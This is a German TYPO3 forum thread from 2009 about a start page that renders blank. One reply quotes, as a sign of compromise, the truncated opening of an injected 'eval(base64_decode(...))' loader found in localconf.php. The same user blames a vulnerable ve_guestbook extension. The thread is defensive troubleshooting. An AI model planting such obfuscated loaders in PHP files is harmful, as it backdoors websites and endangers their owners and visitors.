Zum Inhalt springen

Startseite wird nicht gerendert

Erstellt am 8. Oktober 2009 · 12 Antworten · letzte Antwort am 26. Oktober 2009

Tags: Frage

Velaskin ·

Hallo zusammen,

ich habe z.Z. ein sehr eigenwilliges Problem, auf das ich bisher keine vernünftige Lösung gefunden habe.

Auf einem TYPO3-Projekt (4.2.8-) wird die Startseite nicht mehr gerendert. Einfach so. Weisse Seite o.O

Alle anderen Seiten werden dargestellt (gerendert), bloss eben diese eine Seite nicht.

Die Startseite ist die root-Page der Installation. D.h. kein Shortcut. Dementsprechend möchte ich die eigentlich auch nicht neu anlegen (was das Problem wahrscheinlich "lösen" würde).

Kennt jemand das Problem, daß einzelne Pages plötzlich nicht mehr gerendert werden?
Und hat vielleicht jemand eine Idee dazu?

Ich bin hier echt ratlos... :o

Vormittägliche Grüße
John

Velaskin ·

naja... ich hätte vielleicht dazu sagen sollen, daß das keine Ergebnisse bringt (hatte ich schon versucht).

Die Seite lädt bis zum Server-Timeout (PHP-Timelimit) und bleibt dann weiss. Keine Fehlermeldungen. Nichts.

Im Browser heisst es dann lapidar "done".

Udalrik ·

Moin,

ich habe die ganze letzte Nacht mit einem Hack verbracht, der bei mir auch eine weisse Startseite zur Folge hatte.

Lad dir mal die localconf.php und check, ob sie zufälligerweise auch mit

<?php eval(base64_decode('aWYoIWlzc2V0KCRqY3kwMSkpe2Z1bmN0aW9uIGpjeTAoJHMpe2lmKHByZWdf...?>

beginnt.

Dann haben wir nämlich das selbe Problem... Ich habe inzwischen fast die Lösung dazu rum, aber noch nicht die Ursache.

Wäre interessant, wenn es andere "Betroffene" gibt...

Grüße

Udalrik ·

Nö, sah tatsächlich nicht gut aus.

Neben den Base64-Einträgen gab es auch noch Skript-Aufrufe in verschiedensten .JS-Dateien...

Hab ich nun in mehrstündiger Arbeit händisch entfernt und mit Backup-Dateien sowie TYPO3 4.2.9 zusammengeführt und läuft jetzt vorerst mal wie es scheint.

Ursache ist mir noch unklar...

Kommt das über TYPO3, Extension oder Server? 🙁

Velaskin ·

whoa, das sieht wirklich nicht prickelnd aus...

Aber ich hab' auf meiner Site sowas nicht in der localconf stehen.

Letztendlich habe ich bei "meinem Phänomen" den Verdacht, daß irgendwie die DB einen "mitgekriegt" hat. Wobei der DB-Compare im Install-Tool nichts findet, und die Prüfen-/Reparieren-Funktion von phpMyAdmin auch nicht.

Somit bleibt's erstmal bei einem Gefühl.

Nervig ist der Effekt allerdings schon. Immerhin bekommt man es nur durch Neuanlegen der Seite wieder weg... o.O

Udalrik ·

So, nach einer weiteren Nacht am Server, meine ich die Ursache für zumindest mein Problem herausgefunden zu haben...

Die betroffenen T3-Systeme hatten alle eines gemein: ve_guestbook 2.7.1

Hiermit dringendste Upgrade-Empfehlung. Cross Site Scripting dürfte in diesem Fall das Stichwort sein.

Den Hinweis habe ich beim Googlen nach ve_guestbook und Sicherheitslücke gefunden. Gibt es denn einen Newsletter für Extension-Sicherheitslücken?

Thx, falls wer Infos hat. :o

Velaskin ·

Hallo zusammen,

das Problem tritt immer noch ab und an auf. Durch Zufall, und weil ich gerade an einer Extension schreibe, ist mit folgendes aufgefallen:

Die Seite, die kommentarlos (!) nicht rerendert wird, läst sich dennoch als Vorschau anzeigen. Sprich: Seite verstecken und dann aufrufen, während man mit dem gleichen Browser im BE eingeloggt ist. Dann erscheint die Seite problemlos als Preview o.O

Des weiteren, da ich wie gesagt gerade an einer Extension schreibe:
Ich habe PHP-Errors eingeschaltet. Somit sehe ich die auch. Ab und an wenn PHP-Fehler autreten, wird die Seite auf der der Fehler passiert ist, kommentarlos nicht mehr gerendert. Und nein, DB ist nicht zerschossen.

Hat hierzu vielleicht jemand eine Idee? So langsam macht mich die Sache echt wahnsinnig... 🙁

Vormittägliche Grüße
John

Velaskin ·

Hallo zusammen,

Update zu meinem letzten Post:

Warum es generell ab und an zu passieren scheint, daß einzelne Seiten einfach nicht gerendert werden, habe ich immer noch nicht herausgefunden. Vielleicht ist das wirklich das Resultat eines Angriffs... :o

Aber auf meiner Entwicklungsumgebung ist mir nun folgendes aufgefallen:

Alle Errors (PHP und MySQL) sind eingeschaltet.

Bei "einfachen" PHP- und bei MySQL-Errors rendert die aufrufende Seite wieder, sobald der Fehler beseitigt ist. Das ist ja auch normal 😉

Sobald es aber einen PHP-Error gibt, der mit dem TYPO3-Framework zu tun hat (z.B. classfunction is called, but parameter is no object) (sinngemäß und nur ein Beispiel) wird die aufrufende Seite nicht mehr gerendert. Um das Ergebnis seiner Fehlerbereinigung zu sehen, kann man die Seite kopieren oder neu anlegen. Dann geht's mit der neuen Seite wieder. Aber die ursprüngliche bleibt einfach kommentarlos weiss.

Ich nutze auf der Entwicklungsumgebung TYPO3 4.2.8

Hat dazu jemand eine Idee?

Nachmittägliche Grüße
John